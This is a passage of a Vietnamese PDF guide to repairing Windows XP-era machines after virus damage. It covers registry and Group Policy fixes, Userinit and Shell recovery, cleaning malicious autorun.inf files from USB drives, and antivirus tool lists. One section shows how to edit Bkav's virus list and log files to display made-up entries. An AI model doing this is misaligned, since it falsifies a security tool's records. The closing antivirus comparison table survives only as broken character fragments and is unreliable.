Phục hồi Task Manager-Regedit-MSConfigTrước hết, bạn phải đảm bảo máy tính đã sạch virus, nếu không, mọi hành động sẽ là vô nghĩa. Virus sẽ nhanh chóng nhận biết các thay đổi của bạn và tiếp tục điều chỉnh lại hệ thống theo ý của chúng, còn nhanh hơn bạn rất nhiều lần.1. Bị khoá Registry Triệu chứng: Khi bấm Start > Run > gõ regedit chỉ nhận được một thông báo "Registry editor has been disabled by your administrator". Khắc phục: Mở Notepad ra, copy và dán đoạn mã này vào và save nó lại thành file UnHookExec.inf [Version] Signature="$Chicago$" Provider=Symantec [DefaultInstall] AddReg=UnhookRegKey [UnhookRegKey] HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*" HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*" HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*" HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*" HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe ""%1""" HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*" HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\ System,DisableRegistryTools,0x00000020,0 Hoặc tải file này http://securityresponse.symantec.com/avcenter/UnHookExec.inf về sử dụng luôn. Sau khi lưu, nhấn chuột phải vào nó rồi chọn "Install". Nếu cần restart lại máy. 2. Mất Folder Option Triệu chứng: Mở Explorer, tại Menu Tools, thấy biến mất menu Folder Option.

Page 26: Tong Quan Virus

Khắc phục: Có 2 cách sau đây: Cách 1 Bấm Start > Run gõ vào Regedit: Nếu Registry bị khoá thì thực hiện theo phần 1. Nếu mục Run bị khoá thì thực hiện theo phần 6 ở bên dưới. Tìm đến khoá sau: User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer Bên cửa sổ bên phải bạn sẽ thấy một giá trị REG-DWORD có tên là "NoFolderOptions" Bạn click double để chỉnh sửa giá trị của nó như sau: Value: 0 - hiện menu , 1 - ẩn menu.

Cách 2 Bây giờ vào Start > Run. Nếu mục Run bị khoá thì thực hiện theo phần 6 của bài viết này. Gõ vào GPEdit.msc rồi chọn OK. Sau đó vào tiếp User Configuration/Administrative Template/Windows Component/Windows Explorer

Nhấn đúp chuột vào mục REMOVE THE FOLDER OPTIONS... và chọn Disable. Xong đóng lại, ra Run gõ GPUPDATE /FORCE rồi bấm OK. 3. Không hiển thị được file ẩn Triệu chứng: Bạn thấy biến mất dữ liệu, không nhìn thấy nó mặc dù biết chắc chắn là nó vẫn ở đó. Mở Explorer, bấm Menu Tools, chọn Folder Options (nếu không nhìn thấy Folder Options thì thực hiện mục 2 của bài viết này). Vào tab View/Advanced Settings, mục "Hidden files and folders". Cho dù bạn có bấm xuống "Show Hidden Files and Folders" rồi bấm Apply hay OK thì file ẩn vẫn cứ ẩn. Mở lại Setting đó thì nó lại như cũ.

Khắc phục: Mở Notepad ra, copy và dán đoạn mã này vào và save nó lại thành file ShowHiddenFile.reg REGEDIT4

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL] "RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\ Explorer\\Advanced" "Text"="@shell32.dll,-30500" "Type"="radio" "CheckedValue"=dword:00000001 "ValueName"="Hidden" "DefaultValue"=dword:00000000 "HKeyRoot"=dword:80000001 "HelpID"="update.hlp#51105"Sau khi save, bạn nhấn đúp chuột vào nó để import vào registry. Nếu cần restart lại máy. Rồi vào Folder Options để hiệu chỉnh Show Hidden Files and Folder. 4. Bị ẩn (hidden) file và folder dữ liệu Triệu chứng: Thấy biến mất dữ liệu. Mở Folder Options, chọn show all files lên thì nhìn thấy dữ liệu tự động bị ẩn (bị đặt thuộc tính Hidden hoặc System). Bỏ check Hidden đi thì không bỏ được. Thuộc tính System thì Windows đã bỏ không cho sử dụng, mặc dù thuộc tính này của file vẫn tồn tại. Khắc phục: Mở cửa sổ Explorer ra, chuyển đến chỗ có chứa các file ẩn, bấm chuột phải vào đâu đó trên vùng trống của cửa sổ Explorer. Tại menu bật ra, chọn New/Shortcut. Một cửa sổ Creat Shortcut sẽ xuất hiện. Tại ô Type the location of the item, bạn copy và dán dòng sau đây vào đó: attrib.exe -s -r -h

Page 27: Tong Quan Virus

Bấm Next. Tại ô Type a name for this shortcut, bạn đặt tên cho Shortcut, ví dụ như showfile chẳng hạn. Bạn sẽ có một file shortcut có tên là Showfile.lnk. Sau đó, bất cứ file hay folder nào bị đặt thuộc tính "không bình thường" (bị Read Only, bị Hidden, bị System) bạn cứ kéo file hoặc folder đó thả vào biểu tượng của Shortcut Showfile. 5. Bị khoá Task Manager Triệu chứng: Bấm Ctrl-Alt-Del, chỉ thấy nhận được thông báo "Task Manager has been disabled by your administrator". Khắc phục: Chọn một trong hai cách sau: Cách 1. Thay đổi Registry Bấm Start > Run gõ vào Regedit: Nếu registry bị khoá thì thực hiện theo phần 1 của bài viết này. Nếu mục Run bị khoá thì thực hiện theo phần 6 của bài viết này. Tìm đến khoá sau: HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Policies \System Tại cửa sổ bên phải, bạn sẽ thấy một giá trị REG-DWORD có tên "DisableTaskMgr" Bạn click double để chỉnh sửa giá trị của nó như sau: Value: 1= Cấm Task manager. Value: 0= Mở khoá TaskManager. Hoặc đơn giản là xoá đi, bạn sẽ mở được Task Manager.

Cách 2. Dùng Administrative Tool Bây giờ hãy vào START --> RUN Nếu mục Run bị khoá thì thực hiện theo mục 6 của bài viết này. Gõ vào GPEdit.msc rồi chọn OK Ở cửa sổ Group Policy settings, chọn User Configuration\Administrative Templates\System Chọn Options Ctrl+Alt+Delete Chọn Remove Task Manager Nhấn đúp chuột vào vào mục Remove Task Manager và chọn Disable. Xong đóng lại, ra Run gõ GPUPDATE /FORCE rồi bấm OK. 6. Mất mục Run Triệu chứng: Đáng nhẽ ở menu Start, phải có mục Run để chúng ta chạy các phần mềm không nằm trong Start Menu. Nhưng giờ nó đã biến mất. Khắc phục: Bấm Start/All Programs/Accessories. Mở Command Prompt. Cửa sổ Command Prompt sẽ xuất hiện. Giờ thì gõ thẳng "Regedit.exe" vào dòng lệnh của Command Prompt. Bạn sẽ mở được Registry Editor. Bạn tìm đến khoá sau: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Explorer\ AdvancedỞ cửa sổ bên phải, Bạn sẽ thấy một giá trị REG-DWORD với tên "StartMenuRun". Sửa giá trị thành 0 nếu muốn tắt, 1 nếu muốn khoá. Hoặc đơn giản là xoá nó đi. Khởi động lại máy.

Dùng phần mềm :1. VNFix1.1 : Công cụ giúp phục hồi các thiết lâp cho xem Task Manager, Registry, Folder Option, hiện file ẩn, hiện phần mở rộng, hiện file hệ thống.Ngoài ra, công cụ còn cho phép kiểm tra trong hệ thống có những thay đổi các thiết lập trên hay không, điều này khá thuận tiện.Chương trình có giao diện bằng Tiếng Việt nên rất dễ sử dụng.Download : http://www.baongay.com/dl/vn_fix1.rar

Page 28: Tong Quan Virus

2. [FireLion] Enabler 2.0 : Ngoài phục hồi các thiết lập như cho phép hiển thị Task Manager, Folder Options, hiện file ẩn, làm việc trên registry... Công cụ này còn cho phép điều chỉnh lại trang chủ (Home page), hiệu chỉnh lại Startup Menu.Công cụ này nằm trong bộ [FireLion] All Tools In One. Công cụ này có sẵn khi bạn cài đặt [FireLion]FastHelper.Trong bộ [FireLion] All Tools In One còn hỗ trợ 2 công cụ hữu ích khác là : - [FireLion]AutorunsFixer 1.3 giúp bạn có thể quản lý các tập tin autorun.inf.- [FireLion]Process Manager 2.0 giúp bạn quản lý tiến trình với các chức năng căn bản.Download : www.fire-lion.com

Bị LogOut khi vừa hiện màn hình DesktopMọi việc khởi động đều suôn sẻ từ khi bạn bấm nút Power để khởi động máy, cho đến khi xuất hiện màn hình Desktop thì lập tức bạn bị LogOut ra màn hình chọn tên sử dụng để đăng nhập. Bạn cố sức chọn các tài khoản khác nhau để khởi động nhưng đều vô dụng.Ðây là lỗi không tìm thấy file UserInit trong hệ thống (Bạn có thể tìm hiểu key này ở phần trên).Tôi đã thấy rất nhiều người dùng khi gặp lỗi này đành ngậm ngùi cài đặt lại máy tính của họ. Trên thực tế không nhất thiết phải làm như vậy, chúng ta sẽ lần lượt được biết các cách phục hồi hệ thống như sau.Có một điều tôi lưu ý với các bạn là Windows luôn tìm cách bảo vệ một số file (Không cho xóa, hay sửa đổi các file này) trong đó có file userinit.exe. Vì vậy hầu như không có virus tìm cách thay thế hay sửa đổi file này mà chúng thường chỉ thay đổi giá trị trong key UserInit của registry.Cách 1 : Phục hồi hệ thống nếu biết giá trị của key UserInitMỗi virus sẽ có một giá trị nhất định ghi trong key UserInitVí dụ :Virus w32.vbvn.rootkit ghi giá trị : C:\Windows\system32\runxpro.exe

Lúc này, bạn chỉ việc khởi động trên nền Dos (Bạn có thể khởi động bằng các đĩa Boot) bạn chỉ việc copy tập tin userinit.exe gốc (Nếu thư mục hệ thống là C:\Windows thì tập tin đó sẽ có đường dẫn là C:\windows\system32\userint.exe ).Tuy nhiên, tôi sẽ không đi sâu vào cách này bởi vì trong thực tế người dùng rất ít khi để ý đến giá trị của key này (Khi hệ thống có trục trặc, thì họ mới thường tìm cách biết nó là gì).

Cách 2 :Phục hồi key UserInit.exe ngay cả khi không biết giá trị của key UserInit.Ðều này đồng nghĩa với việc bạn sẽ truy cập và chỉnh sửa registry ngay cả khi bạn chưa cần vào hệ điều hành.Để Boot bằng các đĩa CD cứu hộ này, bạn cần phải có nhất thiết lập nhất định để có thể Boot bằng các đĩa này. Với các BIOS khác nhau thì có cấu trúc thiết lập khác nhau, nên trong vấn đề này tôi sẽ không đi sâu mà chỉ tập trung các thao tác để cứu hộ sau khi đã Boot thành công.

Bạn có thể sử dụng công cụ Avast!Registry Editor trong đĩa miniPE (Start -> Programs -> Registry Tools -> Avast!Registry Editor), hay Remote (RunScaner) trong đĩa XPE (Start -> All Programs -> RegEdit -> Remote (RunScaner) )

Page 29: Tong Quan Virus

Việc truy cập và chỉnh sửa registry được thực hiện giống như trong Windows bình thường.Bạn truy cập vào key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinitvà ghi giá trị sau C:\Windows\System32\userinit.exe (Với C:\Windows là thư mục cài đặt hệ điều hành).

Ngoài ra, trong trường hợp xấu, tập tin userinit.exe không tồn tại hoặc đã bị virus sửa đổi thành công. Bạn có thể vào thư mục i386\system32 của đĩa CD để tìm tập tin userinit.exe rồi copy sang thư mục C:\Windows\system32\userinit.exe.

Page 30: Tong Quan Virus

Khởi động máy tới màn hình Desktop thì dừng lạiMột số máy tính sau khi bị máy tính phá hoại, khi khởi động máy trở lại bình thường cho đến màn hình Desktop thì dừng lại mà không xuất hiện các Icon, thanh Start...Nếu hộp thoại Windows Task Manager không bị chặn lạiĐể khắc phục lỗi này bạn nhấn tổ hợp phím Ctrl +Alt + Delete để gọi Windows Task Manager.Trong hộp thoại Windows Task Manager bạn chọn thẻ Applications. Bạn chọn New Task... Hộp thoại Create New Task bạn nhập vào explorer.exe . Rồi ấn chọn OK.Sau đó bạn vào registry và chỉnh sửa lại giá trị của key Shell trở về giá trị ban đầu trước khi bị virus phá hoại.Đường dẫn key : HKEY_LOCAL_MAHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\ShellGía trị mặc định : explorer.exe (Hay C:\Windows\explorer.exe)Với C:\Windows là thư mục cài đặt hệ điều hành.Nếu hộp thoại Windows Task Manager bị chặn lạiLúc này bạn không thể sử dụng các công cụ như registry để soạn thảo.Bạn có thể sử dụng các thao tác cứu hộ như đã thực hiện với key UserInit tôi đã trình bày ở phía trên để phục hồi giá trị giá trị của key Shell như ban đầu.Sau khi thực hiện xong bạn tiến hành khởi động lại máy tính.

Page 31: Tong Quan Virus

V. Một số kỹ thuật khácĐể Internet Explorer an toàn hơn

Để tránh việc bị virus lây nhiễm qua những đoạn mã VBScript bạn chỉ cần thực hiện các thao tác thiết lập sau (Thao tác được tôi thực hiện trên Internet Explorer 6) :Trong cửa sổ làm việc của Internet Explorer bạn chọn Tool -> Internet Options... -> Chọn thẻ Security -> Chọn Internet -> Default Level.Bạn chú ý đến một thanh kéo sẽ xuất hiện, nếu bạn chọn High có nghĩa là mức an ninh cao nhất, điều này đồng nghĩa các tất cả ứng dụng như các Script, các ActiveX hay Java hay ngay cả việc download file... đều sẽ bị chặn. Rõ ràng như vậy là quá bất tiện.Theo tôi bản chỉ nên chọn mức Medium bấm Apply rồi chọn Custom Level..., cửa sổ Security Settings sẽ xuất hiện. Bạn kéo xuống để thấy các tùy chọn về Scripting. Để chặn việc chạy các Script bạn có thể chọn Disable cho 2 mục Active scripting và Allow paste operations via script.

Sau đó bạn chọn OK, và cuối cùng bạn bấm OK một lần nữa ( Trong cửa sổ Internet Explorer).Bây giờ bạn có thể thoải mái hơn khi truy cập các trang web với thiết lập vừa rồi.

Không cho virus lây qua Yahoo Messenger gửi thông điệpNhư đã phân tích ở phần trên, các virus lây truyền qua Yahoo Messenger liên tục giả lập hang loạt thao tác của bàn phím để gửi thông điệp đến những nạn nhân tiếp theo. Để ngăn chặn chúng gửi thông điệp của chúng, chúng ta sẽ sử dụng chính đặc điểm này của chúng. Cụ thể ở đây, chúng ta sẽ vô hiệu hóa tính năng Enter dể gửi đi một thông điệp, thay vào đó bạn bắt buộc phải ấn vào nút Send cho mỗi thông điệp gửi đi.Làm như vậy, khi virus gửi thông điệp thì chỉ thực hiện đến hết thao tác nhập thông điệp vào ô nhập thông điệp rồi dừng lại mà thể gửi đi thông điệp (Phím Enter của virus giả lập vẫn được thực hiện, tuy nhiên lúc này phím Enter đó sẽ không thể gửi thông điệp được).

Chúng ta sẽ cấu hình lại Yahoo Messenger như sau:Trong cửa sổ Yahoo Messenger chúng ta chọn Messenger -> Preferences. Cửa sổ Yahoo! Messenger Preferences sẽ xuất hiện. Bạn tiếp tục chọn Messenges. Trong khung Pressing Enter in a message windows : bạn nhấn chọn Inserts a new line in the message rồi ấn OK.

Kiểm tra 1 liên kết có virus hay khôngChúng ta đã nói về lý do tại sao lại bị nhiễm virus ngay chỉ khi chúng ta truy cập vào một trang nào đó. Bạn thắc mắc làm thế nào chúng ta nhận ra một trang web nào đó có mang theo những đoạn mã nguy hiểm kia không ? Tôi sẽ hướng dẫn vấn đề này tại phần này.

Page 32: Tong Quan Virus

Bạn truy cập vào địa chỉ sau : http://online.drweb.com/?url=1 , sau đó nhập liên kết mà bạn muốn kiểm tra xem có chứa những đoạn mã hay không vào rồi bấm SCAN!. Chời đợi trong giây lát, sẽ có một cửa sổ nhỏ hiện ra báo cho bạn kết quả.

Nhận biết nhanh virus giả dạng thư mụcMột thủ thuật nhỏ sau đây sẽ giúp bạn an toàn hơn khi quản lý hệ thống với Windows Explorer.Để làm được điều này, bạn thiết lập như sau : Trong cửa sổ Windows Explorer đang làm việc, bạn chọn : View -> Ấn chọn Status bar.

Bây giờ, chúng ta nhắc lại một chút về virus giả dạng thư mục. Chúng sẽ có icon giống thư mục, nhưng bạn nên nhớ nó vẫn là 1 file. Chúng ta sẽ sử dụng sự khác nhau này để dễ dàng nhận ra virus giả dạng thư mục.Bạn hãy tập một thói quen nhỏ như thế này, mỗi khi định vào một thư mục nào đó, thay vì bạn nháy đúp nhanh vào chúng bạn hãy chọn chúng mà thôi.Bạn sẽ dễ dàng nhận ra điều sau :- Nếu đối tượng bạn chưa chọn đối tượng nào thì thanh trạng thái (Status bar) bên dưới sẽ hiển thị tổng số đối tượng của thư mục đó và tổng dung lượng của thư mục đó.- Nếu bạn chọn một đối tượng là thư mục thì trong phần bên trái của thanh này sẽ hiện 1 objects và khung ngay bên cạnh nó sẽ không có giá trị nào.- Nếu bạn chọn một đối tượng là tập tin thì trong phần bên trái khung trạng thái sẽ hiển thị các thông tin về file ấy (Với file .exe thì sẽ hiển thị các thông tin : File version, Company...) và ở ô ngay bên phải của ô này là dung lượng file.Như vậy bạn có thể dễ dàng nhận ra và phân biệt được chúng.

Thông báo liên kết sạchThông báo liên kết chứa mã độc

Page 33: Tong Quan Virus

Nhanh chóng chúng ta nhận ra rằng, chỉ cần chọn trước thư mục muốn vào, nếu thấy thông số dung lượng xuất hiện thì chắc chắn đây là virus giả dạng thư mục. Còn thư mục ban đầu đã ở đâu ? Nhiều khả năng chúng đã bị ẩn đi, đi khắc phục bạn đọc phần phía trên có tên Phục hồi các thư mục ẩn.Làm sao để diệt chúng ? Bạn hãy coi phần ngay bên dưới.

Làm sạch USBCác USB sau khi sử dụng trên các máy tính nhiễm virus lây lan qua USB sẽ bị nhiễm virus theo. Các các lây nhiễm bạn có thể đọc ở phần trên của tài liệu, sau đây tôi sẽ trình bày cách để làm sạch USB tùy trường.1. Với virus tạo autoruns.inf :Bạn có thể thiết lập lại hệ thống để có thể nhìn thấy file ẩn rồi xóa file autoruns.inf vào file ghi trong có giá trị được khởi động.Để biết giá trị này bạn có thể dùng Notepad để đọc file autoruns.inf.

Ví dụ với nội dung file Autoruns.inf trong USB có giá trị như sau :[Autorun]OPEN=boot.pifThì file sẽ được USB khởi động khi Autorun (Ở đây tôi đang xét nó chính là virus) có đường dẫn như sau : Tên đĩa USB:\boot.pif Như vậy bạn chỉ cần vào thư mục gốc của USB và xóa file boot.pif là được.Bạn nên để ý, phần lớn virus sẽ tự đặt chế độ ẩn (Hidden) và sẽ thiết lập lại máy bạn để bạn không thể xem file ẩn với Windows Explorer. Bạn có thể xem phần Không hiển thị được file ẩn ở phía trên để thiết lập lại việc xem các thư mục và tập tin ẩn, hoặc đơn giản hơn là sử dụng các phần mềm quản lý file như : Total Commander, Norton Commander hay Far Manager để có thể làm việc với các thư mục cũng như file ẩn.2.Với virus đánh lừa người dùng qua biểu tượng

Page 34: Tong Quan Virus

Các loại virus này sẽ có biểu tượng giống hình thư mục nên trong khi thao tác bạn thường hay bị nhầm lẫn.Tuy nhiên, đây lại chính là điểm mà bạn có thể tận dụng để diệt thủ công các loại virus này trong USB. Tận dụng bằng cách tìm kiếm tất cả các tập tin thực thi trong đĩa USB có biểu tượng là hình thư mục.Bạn thực hiện theo các bước sau :1. Trong Windows Explorer (Nếu bạn không biết Windows Explorer là gì thì bạn hãy mở My Computer).2. Trên thanh công cụ bạn chọn nút Search.3. Xuất hiện 1 khung với câu hỏi : What do you want to search for ? . Bạn chọn All files and folders .4. Trong ô All or part of the file name bạn nhập vào giá trị “.exe or .scr” (Không có dấu “).Sở dĩ chúng ta phải tìm với cả 2 loại file .exe và .scr là vì không chỉ file .exe mới là file thực thi có thể có biểu tượng hình thư mục mà cả file .scr cũng có thể có điều này.Trong ô Look in : bạn chọn ổ đĩa USB.5. Bạn bấm Search để tiến hành việc tìm kiếm.

Page 35: Tong Quan Virus

Như bạn thấy trong hình, các loại tất cả các loại file .exe hay .scr đều được hiển thị, bằng mắt bạn có thể nhận ra các virus và dễ dàng xóa chúng.

Tuy nhiên bạn cần lưu ý : Việc xóa virus khỏi đĩa USB khi virus đã dừng hoạt động trên máy bạn. Không chỉ có file .exe và .scr được hiển thị mà đôi lúc cả thư mục hay các tài liệu khác cũng được hiển thị trong kết quả. Sở dĩ như vậy là do các tên file hay thư mục đều có quyền dùng ký tự “.”, điều này đồng nghĩa người dùng có thể đặt tên một tài liệu nào đó mang tên : TaiLieu.exe.doc hay một thư mục nào đó mang tên Love.exe.Để tránh việc xóa nhầm chúng bạn nên chú ý như sau :- Với các tài liệu dạng như TaiLieu.exe.doc thì bạn an tâm, chúng thường có biểu tượng khác nên bạn có thể nhận ra mà không xóa nhầm chúng.- Với các thư mục, bạn để ý nhìn vào thông số Size. Các thư mục sẽ không có thông số Size. Điều này giúp bạn nhận ra và tránh xóa nhầm chúng.

Một số virus cố tình ẩn các thư mục trong máy tính đi, thay vào đó là sự xuất hiện 1 bản của chính virus đó và có tên trùng với thư mục kia. Điều này làm người dùng nhầm tưởng file do virus tạo ra lại là thư mục mình muốn làm việc và kích hoạt virus làm việc. Với loại virus này bạn cần áp dụng cách này và một phần ở trên là khắc phục Bị ẩn (hidden) file và folder dữ liệu.

Tránh Autorun của USBCó nhiều cách để bạn tránh bị nhiễm virus qua chế độ autorun. Dễ dàng nhất là dùng các phần mềm như đã nêu ở 1. Với virus tạo autoruns.inf ở phần Làm sạch USB.Nhưng nếu máy tính bạn chưa có sẵn chúng hay đơn giản là bạn đã quen với Windows Explorer thì sau đây là cách bạn cần làm.Ngay tại cửa sổ hiển thị các ổ đĩa (My Computer) bạn nhập trực tiếp đường dẫn của đĩa bạn muốn truy cập vào thanh Address và nhấn Enter.

Page 36: Tong Quan Virus

Ví dụ tên đĩa bạn muốn truy cập là E thì bạn bạn nhập E:\ vào thanh Address và nhấn Enter.Một số loại virus (Như Kavo) cũng sử dụng cách khởi động bằng autorun nhưng không chỉ với đĩa USB mà cả các đĩa chính không máy. Vì vậy khi diệt loại virus này bạn cũng cần phải truy cập các ổ đĩa trong máy bằng cách này.

Nghịch Bkav

Với Virus ListBkav là phần mềm diệt virus nổi tiếng nhất Việt Nam hiện nay, giao diện dễ dùng, với một sự đầu tư rất kỹ lưỡng của tập thể những chuyên gia an ninh mạng của Bkis. Không vì vậy vậy mà Bkav không có điểm yếu.Trong bài viết này, sẽ hướng dẫn cho mọi người biết một trong những điểm “Vui tính” của Bkav. Điều đều tiên các bạn cần làm là cài đặt Bkav và chạy nó ở chế độ chạy nền.Trong thư mục cài đặt của Bkav (Ví dụ ở máy tôi là C:\Program Files\Bkav2006 ) bạn sẽ thấy file BKAV.VRL.Bạn hãy mở nó ra bằng Notepad nào.Thay đổi nó bằng bất kỳ cách nào bạn muốn. Bạn chú ý, cần giữ lại cấu trúc của nóVí dụ bạn sẽ thấy 1 dòng như sau : W32.YMDungcoiA.Worm|xxxx|Worm thì bạn đừng xóa mất mấy cái dấu “|” đấy nhéGiờ bạn lưu nó lại nào.Bạn mở Bkav lên vào xem Virus List của nó. Chắc chắc sẽ có điều thú vị đấy.Tuy nhiên, bạn nên chú ý là cách này chỉ làm hiển thị khác đi trong virus list của Bkav thôi. Còn khả năng diệt virus vẫn còn y như cũ. Nhưng trong lần khởi động Bkav sau thì những gì bạn đã sửa chữa sẽ mất tác dụng.Nhật kýCũng vào thư mục như bên trên, nếu phần nhật ký hiện tại của Bkav không là trống, bạn sẽ thấy file Bkav.log (Nếu Bkav đang chạy với tùy chọn hiển thị là Tiếng Việt). Bây giờ bạn dung Notepad mở nó và chọn font hiển thị là .vnTime .Bạn sẽ thấy một số ký tự không thể hiển thị (Là các ô vuông). Khi chỉnh sửa bạn không được sửa chữa các ký tự này, còn các dữ liệu kia bạn có thể thoải mái thay đổi (Bạn có thể ghi Tiếng Việt). Sau đó lưu lại.Bạn có thể dễ dàng biến thẻ nhật ký của Bkav thành nhật ký của... mình.Bạn cũng nên chú ý, do Bkav dùng 2 ngôn ngữ nên sẽ có 2 file nhật ký khác nhau (File còn lại là BKAVE.log . Nếu bạn chọn ngôn ngữ nào thì Bkav sẽ dung nhật ký tương ứng với file của ngôn ngữ đó. Do vậy khi bạn viết nhật ký nên để ý ngôn ngữ Bkav đang dung hiện tại.

Chương 4 : Một số phần mềm cần biết

Phần mềm giúp nhận dạng và tiêu diệt

ProcessXP : Phần mềm cho phép quản lý các tiến trình đang chạy trong hệ thống. Không chỉ là quản lý các tiến trình đơn giản như Task Manager, ProcessXP còn cho phép bạn dễ dàng xem đường dẫn, icon, xem tiến trình theo kiểu cây...

Page 37: Tong Quan Virus

Download : http://download.sysinternals.com/Files/ProcessExplorer.zip Autoruns : Cũng là chương trình quản lý các chương trình khi khởi động như MSConfig nhưng Autoruns liệt kê đầy đủ hơn rất nhiều. Ngoài ra cũng như ProcessXP, chương trình liệt kê đầy đủ các thông tin như đường dẫn, hiển thị icon, báo lỗi khi khóa khởi động đó không còn hợp lệ (File được khởi động ở khóa đó không còn tồn tại)...Download : http://download.sysinternals.com/Files/Autoruns.zip HijackThis : Chương trình cho phép liệt kê và phục hồi thông tin về các tiến trình, các khóa khởi động và một số thông tin quan trọng khác. Việc này rất hiệu quả nếu bạn muốn chia sẻ tình trạng máy mình cho người khác (Như trên các forum) để xác định tình trạng của máy mà không cần phải tới trực tiếp máy đó.Download : http://www.spywareinfo.com/~merijn/files/hijackthis.zip SystemSnapShot : Là phần mềm tương tự HijackThis nhưng chỉ cho phép liêt kê và lưu trữ các thông tin trên máy tính đó. Bù lại chương trình có liệt kê mã MD5 của một số file. Việc này giúp việc xác định máy có tồn tại virus dễ dàng hơn rất nhiều.Download : http://fasthelper.fire-lion.com/download/SystemSnapShot.zip

Phần mềm chống virus

Một số phần mềm chống virus của Việt NamBkavPhần mềm diệt virus có giao diện đơn giản, dễ dùng, chức năng diệt khá tốt, ít tốn tài nguyên hệ thống, tốc độ quét nhanh.Tuy nhiên, phần mềm không nhận dạng và cảnh báo những thao tác cơ bản của virus.Download : www.bkav.com.vn [FireLion]FastHelperÍt ngốn tài nguyên, quét nhanh, có khả năng nhận ra các thay đổi tai các khóa khởi động trong registry, nhận dạng và cảnh báo với một số thao tác của virus thường làm.Tuy nhiên, phần mềm hiện nay có bảng mã nhận dạng virus còn rất nhỏ nên chưa thể đem lại sự an toàn cho bạn.Download : www.fire-lion.com MoonAVPhần mềm diệt virus nằm trong bộ sản phẩm đã từng đạt giải nhất Trí Tuệ Việt Nam trước đây. Bảng mã nhận dạng virus khá lớn nên khả năng nhận dạng và tiêu diệt virus rất tốt, tác động sâu vào hệ thống...Tuy nhiên phần mềm rất tốn tài nguyên bộ nhớ khi chạy, tốc độ quét khá chậm.Download : http://downloads.sourceforge.net/moonav/MsavSetup.2.2.2.160.exe? use_mirror=surfnet D32Phần mềm diệt virus của tác giả Trương Minh Nhật Quang. Có khả năng nhận dạng và diệt virus tốt, ít tốn tài nguyên hệ thống khi hoạt động. Tuy nhiên bảng nhận dạng ít, không có khả năng nhận dạng các thao tác thông thường của virus, cập nhật chậm...Download : Bản Full : http://www.echip.com.vn/echiproot/Softwares/d32/d32004full.zip Bản Lite :http://www.echip.com.vn/echiproot/Softwares/d32/d32004lite.zipBản cập nhật (25/5/2007) : http://echip.com.vn/echiproot/Softwares/d32/d32ud2505.exe

Một số phần mềm của nước ngoàiSau đây là bảng đánh giá các phần mềm diệt virus tốt nhất của năm 2007 do PCWorld Mỹ thực hiện. Đây là một tư liệu quan trọng để các bạn lựa chọn một phần mềm diệt virus thích hợp.

Giải thích một số thuật ngữ :Malware : Phần mềm ác tính là một loại phần mềm hệ thống do các tay tin tặc hay các kẻ nghịch ngợm tạo ra nhằm gây hại cho các máy tính. Tùy theo cách thức mà tin tặc dùng, sự nguy hại của các lọai phần mềm ác tính có khác nhau từ chỗ chỉ hiển thị các cửa sổ hù dọa cho

Page 38: Tong Quan Virus

đến việc tấn công chiếm máy và lây lan sang các máy khác như là virus trong cơ thể của các sinh vật.Phần mềm ác tính còn có tên là ác liệu hoặc phần mềm độc hại, hay được dùng nguyên gốc Anh ngữ là malware. Chữ gốc Anh ngữ malware là sự ghép của hai chữ malicious và software.Proactive :Ở đây các phần mềm chống virus sẽ nhận dạng các thao tác nhất định mà các virus thường thực hiện như ghi vào registry, tạo file, xóa file...

Page 39: Tong Quan Virus

8 7 6 5 4 3 2 1

Th

tự

71

77

78

79

84

84

84

85

Điể

m

Tre

nd

Mic

ro

An

tiviru

s p

lus

An

tiSp

yw

are

20

07

Gris

oft A

VG

7.5

An

tiviru

s

Pro

fessio

nal

Alw

il Avast 4

A

ntiv

irus

Pro

fessio

nal

Pan

da

An

tiviru

s 2

00

7

Eset N

OD

32

BitD

efe

nd

er

An

tiviru

s 1

0

Sysm

an

tec

Norto

n

An

tiViru

s 2

007

Kasp

ers

ky

An

ti-Viru

s 6

Ch

ươn

g trìn

h

82

91

92

90

90

96

96

96

Ph

át h

iện

M

alw

are

(%)

43

34

37

56

79

61

49

51

Nh

ận

dạn

g

Pro

activ

e

(%)

9 2 4 4 5

12

4

10

10

Làm

ch

ậm

h

thốn

g

Rất tố

t

Khá

Khá

Rất tố

t

Rất tố

t

Xuất

sắc

Xuất

sắc

Xuất

sắc

Mứ

c

độ d

sử

d

ụn

g

0 1 5 3 6 14 3 6

Nh

ận

d

ạn

g

sai

Khả n

ăng p

hát h

iện

viru

s kém

nhất tro

ng

8

phần m

ềm

trên

Đứn

g v

ị trí trung

bìn

h

về kh

ả n

ăn

g p

hát h

iện

malw

are

, nhưn

g cu

ối

bảng tro

ng ch

ức n

ăng

b

ảo v

ệ p

roactio

n v

à

gia

o d

iện

Khả n

ăng p

hát h

iện

viru

s tốt, n

hưn

g g

iao

diệ

n kh

ông th

ân

thiệ

n

Khả n

ăng tự

độn

g b

ảo

vệ rấ

t tốt, p

hát h

iện

malw

are

trun

g b

ình

làm

sạch

viru

s kém

Bảo v

ệ m

áy kh

ỏi

Malw

are

tốt, tu

y n

hiê

n

gia

o d

iện

hơi kh

ó d

ùn

g

Khả n

ăng p

hát h

iện

viru

s tuyệt v

ời, tu

y

nh

iên n

gốn kh

á n

hiề

u

tài n

guyên

hệ th

ống

Khả n

ăng p

hát h

iện v

à

làm

sạch

viru

s rất

nh

anh

Khả n

ăng p

hát h

iện v

à

xử lý

nh

anh h

ơn

hẵn

các A

V kh

ác

Đán

h g

iá c

hu

ng

http

://us.tre

ndm

icro.co

m

http

://free.g

risoft.co

m

ww

w.a

vast.co

m

ww

w.p

and

ase

curity

.com

ww

w.e

set.co

m

ww

w.b

itdefe

